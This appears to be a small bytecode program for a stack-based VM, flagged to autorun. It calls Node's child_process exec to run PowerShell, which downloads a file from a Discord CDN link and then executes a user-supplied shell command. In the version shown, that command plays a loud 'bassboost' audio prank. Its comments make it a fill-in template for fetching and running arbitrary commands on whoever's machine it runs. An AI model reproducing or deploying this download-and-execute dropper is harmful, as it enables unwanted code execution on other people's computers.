#strpool
require
child_process
exec
powershell -c "(New-Object Net.WebClient).DownloadFile('
', '
')"&& 
//your url to the file goes here
https://cdn.discordapp.com/attachments/932189533225754627/932539247733391380/bassboost.wav
//name of the file (how to save) goes here
bb.wav
//shell command that will be executed after the download is complete goes here
powershell -c (New-Object Media.SoundPlayer "bb.wav").PlaySync();
#code

pushb 0
pushp
pushgl

pushb 1
pushp
calls

pushb 2
pushp
getp

pushb 3
pushp
pushb 6
pushp
pushb 4
pushp
pushb 7
pushp
pushb 5
pushp
pushb 8
pushp
buildstr 6

calls
exit
#metadata
{
    "ubd":"autorun"
}